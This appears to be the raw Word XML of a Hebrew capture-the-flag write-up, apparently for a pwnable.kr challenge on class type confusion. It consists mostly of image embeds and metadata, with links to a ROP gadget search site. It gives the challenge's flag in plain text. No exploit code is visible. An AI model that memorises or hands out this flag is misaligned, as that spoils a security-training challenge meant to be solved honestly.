    <w:p w14:paraId="20EC1649" w14:textId="035041B8" w:rsidR="0048660F" w:rsidRDefault="0048660F" w:rsidP="00DE018D">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0048660F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C3DBC30" wp14:editId="17696A9C">
            <wp:extent cx="2600688" cy="4220164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CFC" w14:textId="6E7CD554" w:rsidR="00DE018D" w:rsidRDefault="00DE018D" w:rsidP="00DE018D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cs="Cambria Math" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>⋮</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380E1AE0" w14:textId="152EB244" w:rsidR="00DE018D" w:rsidRDefault="00DE018D" w:rsidP="00DE018D">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00244CA1">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AB86465" wp14:editId="780DBDC6">
            <wp:extent cx="5274310" cy="3825875"/>
            <wp:effectExtent l="0" t="0" r="2540" b="317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A8A1" w14:textId="5375E4D4" w:rsidR="00DE018D" w:rsidRDefault="00DE018D" w:rsidP="00DE018D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cs="Cambria Math" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>⋮</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD86AC3" w14:textId="20B2A255" w:rsidR="00DE018D" w:rsidRDefault="00DE018D" w:rsidP="00DE018D">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE018D">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="252F5673" wp14:editId="241447EE">
            <wp:extent cx="4772691" cy="1771897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5EBD" w14:textId="609759D6" w:rsidR="00DE018D" w:rsidRDefault="00DE018D" w:rsidP="00DE018D">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE018D">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="295E5FE7" wp14:editId="2491EFBF">
            <wp:extent cx="4344006" cy="3705742"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="32" name="תמונה 3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תמונה 32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2FB" w14:textId="0DA7292A" w:rsidR="00DE018D" w:rsidRDefault="00DE018D" w:rsidP="00DE018D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math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cs="Cambria Math" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>⋮</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E2DB44" w14:textId="2F73CCC9" w:rsidR="00DE018D" w:rsidRDefault="00D36BDD" w:rsidP="00DE018D">
      <w:r w:rsidRPr="00D36BDD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F688918" wp14:editId="48603F93">
            <wp:extent cx="3515216" cy="3143689"/>
            <wp:effectExtent l="0" t="0" r="9525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C7C" w14:textId="632B5250" w:rsidR="00D36BDD" w:rsidRDefault="00D36BDD" w:rsidP="00D36BDD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">הדגל: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D36BDD">
        <w:t>cl4ss_typ3_confus1on_1s_so0oo00oo00oo0o_c0nfus1ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D637ED" w14:textId="7EEAB62D" w:rsidR="00D36BDD" w:rsidRDefault="00D36BDD" w:rsidP="00DE018D">
      <w:r w:rsidRPr="00D36BDD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D5BE120" wp14:editId="22836A52">
            <wp:extent cx="5274310" cy="1127125"/>
            <wp:effectExtent l="0" t="0" r="254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BDD" w:rsidSect="00B61A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39"/>
    <w:rsid w:val="000A39A8"/>
    <w:rsid w:val="000E5021"/>
    <w:rsid w:val="001331BA"/>
    <w:rsid w:val="001A5208"/>
    <w:rsid w:val="001D2F56"/>
    <w:rsid w:val="00244CA1"/>
    <w:rsid w:val="003129D0"/>
    <w:rsid w:val="003666A0"/>
    <w:rsid w:val="003F33AE"/>
    <w:rsid w:val="00415CEA"/>
    <w:rsid w:val="00456AB2"/>
    <w:rsid w:val="0048660F"/>
    <w:rsid w:val="00511414"/>
    <w:rsid w:val="00523702"/>
    <w:rsid w:val="0055190E"/>
    <w:rsid w:val="00554CED"/>
    <w:rsid w:val="00565CB1"/>
    <w:rsid w:val="00616093"/>
    <w:rsid w:val="00671F3F"/>
    <w:rsid w:val="0068191F"/>
    <w:rsid w:val="006F11F9"/>
    <w:rsid w:val="006F5B41"/>
    <w:rsid w:val="00707259"/>
    <w:rsid w:val="007176C7"/>
    <w:rsid w:val="00795DF1"/>
    <w:rsid w:val="007D3CCC"/>
    <w:rsid w:val="007D41FF"/>
    <w:rsid w:val="007F1232"/>
    <w:rsid w:val="0083449E"/>
    <w:rsid w:val="008C7ED8"/>
    <w:rsid w:val="008F46F6"/>
    <w:rsid w:val="00A66B96"/>
    <w:rsid w:val="00A97A18"/>
    <w:rsid w:val="00AB3939"/>
    <w:rsid w:val="00B61AB7"/>
    <w:rsid w:val="00C17449"/>
    <w:rsid w:val="00C6044E"/>
    <w:rsid w:val="00C974D1"/>
    <w:rsid w:val="00CB39C9"/>
    <w:rsid w:val="00CC4CDC"/>
    <w:rsid w:val="00CD4547"/>
    <w:rsid w:val="00CD489A"/>
    <w:rsid w:val="00CE792C"/>
    <w:rsid w:val="00D00F24"/>
    <w:rsid w:val="00D07900"/>
    <w:rsid w:val="00D36BDD"/>
    <w:rsid w:val="00D47C7B"/>
    <w:rsid w:val="00DB7497"/>
    <w:rsid w:val="00DC4E69"/>
    <w:rsid w:val="00DE018D"/>
    <w:rsid w:val="00DE2B88"/>
    <w:rsid w:val="00E0224F"/>
    <w:rsid w:val="00E3301F"/>
    <w:rsid w:val="00E85AA3"/>
    <w:rsid w:val="00FA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9A86"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3972F0F4-2C35-47EB-A847-D179F0C3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25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A39A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39A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A3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A39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ropshell.com/ropsearch?h=b0097c8a9284b03b412ff171c3d3c9c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pwnable.kr" TargetMode="External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1CC7-6019-42E9-9C5B-9EE2A51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1343</Words>
  <Characters>6718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EHU24@telem.openu.ac.il</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>יהודה שפירא</cp:lastModifiedBy>
  <cp:revision>19</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-09-12T08:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-09-12T13:28:00Z</dcterms:modified>
</cp:coreProperties>
</file>